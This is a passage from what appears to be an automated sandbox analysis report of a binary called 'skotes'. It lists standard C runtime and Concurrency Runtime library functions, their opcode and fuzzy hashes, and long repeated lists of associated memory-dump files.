                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3844194624-0
                                                                                                                                                                    • Opcode ID: 4f162a281013002cf5d7f5321b1690ff48ec1113fac4da65be32d1617ff40780
                                                                                                                                                                    • Instruction ID: b9f2fa512c91a131ca98029d303fa217f0e640a35924ca983153e453a35d402f
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f162a281013002cf5d7f5321b1690ff48ec1113fac4da65be32d1617ff40780
                                                                                                                                                                    • Instruction Fuzzy Hash: 9E01D671200521AFCA657B61E982D6DB76BFF45720F04142DF401A7611CF20AC6197D4
                                                                                                                                                                    Function 006433C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006433DB
                                                                                                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 006433EF
                                                                                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00643407
                                                                                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0064341F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 78362717-0
                                                                                                                                                                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                    • Instruction ID: d9726a43f6dc31acc3fb4f27f9827d8ba2edc64909f0336f357d76009994586a
                                                                                                                                                                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D01D632700524A7CF56EE548841AEFB7EB9F55350F100019FC12AB382DA71EE1196E0
                                                                                                                                                                    Function 00639510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00639519
                                                                                                                                                                      • Part of subcall function 0062F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00635486
                                                                                                                                                                    • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0063953D
                                                                                                                                                                    • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00639550
                                                                                                                                                                    • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00639559
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 218105897-0
                                                                                                                                                                    • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                    • Instruction ID: 91d0b9d402da555da9bb11ee9804499ffda3a44c6850369f0d411cce4010204d
                                                                                                                                                                    • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                    • Instruction Fuzzy Hash: 97F0A731600B205FF6A2AB548811FAA23D79F40721F00841DE55B97283CEA4E886CFD4
                                                                                                                                                                    Function 0064F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ___free_lconv_mon
                                                                                                                                                                    • String ID: 8"g$`'g
                                                                                                                                                                    • API String ID: 3903695350-151162620
                                                                                                                                                                    • Opcode ID: 0a135a11b3ac3bff33c202cbf51172a11f8cfaf8814bce60105ed75d3409e21b
                                                                                                                                                                    • Instruction ID: 54d7d7944e58c16dcaffaa2bb04a10d0618e493d9590c52a280c8a87ccc0f0a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 0a135a11b3ac3bff33c202cbf51172a11f8cfaf8814bce60105ed75d3409e21b
                                                                                                                                                                    • Instruction Fuzzy Hash: 74315A32A00201EFEB61AF79D845B9B73EBEF04352F10442DF049D7696DE70AC808B59
                                                                                                                                                                    Function 0064F1BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0064F232
                                                                                                                                                                    • __freea.LIBCMT ref: 0064F298
                                                                                                                                                                      • Part of subcall function 0064B04B: RtlAllocateHeap.NTDLL(00000000,2054CAE1,?,?,0062D3FC,2054CAE1,?,00627A8B,?,?,?,?,?,?,00617465,?), ref: 0064B07E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
